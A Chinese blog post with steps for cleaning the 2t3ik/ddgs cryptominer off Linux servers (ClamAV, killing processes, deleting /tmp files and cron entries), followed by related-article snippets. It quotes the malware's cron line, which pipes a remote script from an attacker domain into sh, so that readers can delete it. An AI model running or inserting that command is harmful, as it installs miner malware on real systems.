linux服务被植入挖矿(2t3ik与ddgs)解决方式

最新推荐文章于 2022-07-22 13:41:55 发布
最新推荐文章于 2022-07-22 13:41:55 发布
阅读量921 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/piaodangdeyouzi/article/details/81508993
版权

已处理过多台服务器,目前没再被植入挖矿,按照以下步骤可行:

1、安装杀毒软件ClamAV

https://www.cnblogs.com/duoyi/articles/clamav.html

2、删除挖矿植入的代码、定时任务

a、查看占有内存高的进程,

top

b、删除对应的进程

kill -9 ID

c、删除tmp下对应的文件

rm -rf  /tmp/文件2t3ik与ddgs

d、删除定时任务的内容 
crontab -e 
将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 

e、检查/var/spool/cron/root 和 /var/spool/cron/crontabs/root 
删除自动执行命令 
/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh

参考内容:

https://blog.csdn.net/juan083/article/details/52093931

http://www.361way.com/2t3ik-ddgs/5680.html

piaodangdeyouzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux_elasticsearch+kibana+ik_6.2.2.rar
01-31
linux环境下用到的 elasticsearch-6.2.2.tar.gz elasticsearch-analysis-ik-6.2.2. zipkibana-6.2.2-linux-x86_64.tar.gz
elasticsearch-analysis-ik-7.9.3.tar.gz
最新发布
04-11
下载的"elasticsearch-analysis-ik-7.9.3.tar.gz"是IK分词器的Linux版本,适用于Elasticsearch 7.9.3。在安装之前,确保你已经正确安装了Elasticsearch。然后,按照以下步骤部署IK分词器: 1. 解压下载的tar.gz文件...
linux 进程s01wipefs,/bin/wipefs挖矿程序排查
weixin_36108931的博客
04-29 178
#基本情况[root@test ~]# cat /etc/redhat-releaseCentOS release 6.5 (Final)[root@test ~]# uname -aLinux test 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux[root@tes...
linux服务器被植入挖矿病毒后初步解决方案
qq_24274689的博客
07-22 3691
linux服务器被植入挖矿病毒后初步解决方案
Linux中招挖矿木马如何处置,附带解决方案
是故事啊~关注我~
01-25 6866
前段时间一位朋友在群里反应,公司的部署大数据集群的Linux服务器中了挖矿木马病毒,让我给他解决,分享一下解决方法。 一. 什么是挖矿木马 首先经过多年的演进,越来越多的挖矿木马利用多种方式入侵系统,意图感染更多的机器,提高挖矿的效率和收益,其中主要入侵方式如下: 1. 漏洞利用:利用系统漏洞快速获取相关服务器权限,植入挖矿木马是目前最为普遍的传播方式之一。常见的漏洞包括Windows系统漏洞、服务器组件插件漏洞、中间件漏洞、web漏洞等。 部分攻击者选择直接利用永恒之蓝...
阿里云centos上处理2t3ikddgs病毒
be_x_man的博客
04-16 1553
有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示系统centos由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……于是我就没有管它。今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的...
威纶触摸屏TK6070iK3_样本
03-19
威纶触摸屏TK6070iK3_样本。 介绍了关于威纶触摸屏TK6070iK3_样本的详细说明,提供威纶的技术资料的下载。
最新版 elasticsearch-analysis-ik-7.9.3.zip
11-03
安装`elasticsearch-analysis-ik-7.9.3`插件时,通常需要将整个压缩包解压后,将`elasticsearch-analysis-ik-7.9.3.jar`及其依赖文件放入Elasticsearch的`plugins`目录下,然后重启Elasticsearch服务,插件就会自动...
最新版windows elasticsearch-analysis-ik-7.13.3.zip
07-20
本文将聚焦于Elasticsearch Analysis IK插件的最新版本——7.13.3在Windows操作系统中的应用与配置,帮助读者深入理解其功能与使用方法。 Analysis IK是Elasticsearch中一个非常重要的分词插件,专为中文处理设计。...
linux服务器被植入木马挖矿程序的解决过程记录。
weixin_38067745的博客
12-24 4784
今天我的网站突然无法访问,我马上进入服务器排查情况。用top命令查看进程,发现有某个进程的cpu使用率到达90%以上,而这个进程并不是我启动的。我怀疑这个进程是个木马程序,于是我用kill -9 【进程id】把该进程杀掉。发现没过多久该进程又启动了。我反复试了几次还是不行,于是更加断定我的怀疑了。 经过老大的提醒,有可能是redis的漏洞导致被攻击,我马上...
服务器被植入挖矿程序
Fight_Rain的博客
06-11 6250
在阿里云管控台看到有两台服务器cpu使用率一直在100左右,而平时只有不到1 解决1: 连到服务器,top命令发现wipefs进程占用大量cpu资源,先kill掉该进程,再删除一些文件,具体参考https://www.cnblogs.com/liuchuyu/p/7490338.html,删除时可能遇到Operation not permitted,一般是文件属性为 —i———-,先cha...
linux服务器被植入挖矿程序一些处理
weixin_43570089的博客
09-27 1104
环境:服务器在dmz区,安装有weblogic11,jdk1.6,1.7,1.8,还有redis 推测:redis安装为免密登录,这个漏洞造成中毒(不确定) 1、开发人员发现cpu使用率99%+(有时超过100%哦) 2、发现异常proecho占用近乎全部cpu资源。kill proecho,一会就重新启动 3、查看proecho发现在工作目录和/tmp目录下有疑似文件,删除。 查看定时任务,清除...
记一次服务器被植入挖矿木马cpu飙升200%解决过程
weixin_33736048的博客
03-29 1072
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux服务器被挖矿解决办法
qq_40939094的博客
01-08 2635
记录一次Linux服务器被挖矿的经历(chattr文件权限被改)及解决办法 服务器被人挖矿,用sudo权限删除可疑进程后,发现有几个文件始终不能被具有sudo权限的用户删除。上网查找发现,这几个文件的属性被chattr文件(默认路径/usr/bin),这里分两种情况: 一般情况 采用lsattr文件查看不能删除文件(例如temp.txt)的属性 lsattr temp.txt 得到如下结果 该temp.txt文件被增加了属性i,因此不能被具有sudo权限的用户删除。采用chattr文件去除该属性后,即能
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4683
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
阿里云服务器被挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
Linux之在CentOS上一次艰难的木马查杀过程
weixin_33758863的博客
12-13 925
今天朋友说他一台要准备上线的生产服务器被挂马,特征ps命令找不到进程,top能看到负载最高的一个程序是一个随机的10位字母的东西,kill掉之后自动再次出现一个随机10位字母的进程。 我让他关闭这个机器的外网,内网放开,在局域网中给我一个跳板。等我拿到权限之后进入机器,先按照朋友说的验证了一遍,果然是那样,木马有自我保护自我恢复。 这时候我想到一个问题居然是能自我开机启动,要么/e...
Linux系统理论操作学习24】Linux挖矿程序清除,crontab指令查询及修改自动运行命令
呆呆象呆呆的博客
04-19 1733
场景 一半的cpu跑满,每次开机后都是这个情况 猜测 破解了root密码或者用户密码,运行了一个脚本挖矿传递数据 解决方案 一般都是通过crontab指令给你设置了一个定时任务所以我们通过crontab去找寻一下 然后把相关指令删掉 第一步查询是否有自动定时任务 输入如下指令,打开crontab查询有没有自动定时任务 crontab -l 可能会看到如下场景(这就说明你是有自动运行的文件的,下一步就是去看看这个文件是啥) 如果没有会是这样的 第二步关闭自动定时任务 首先输入 crontab -e 编

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值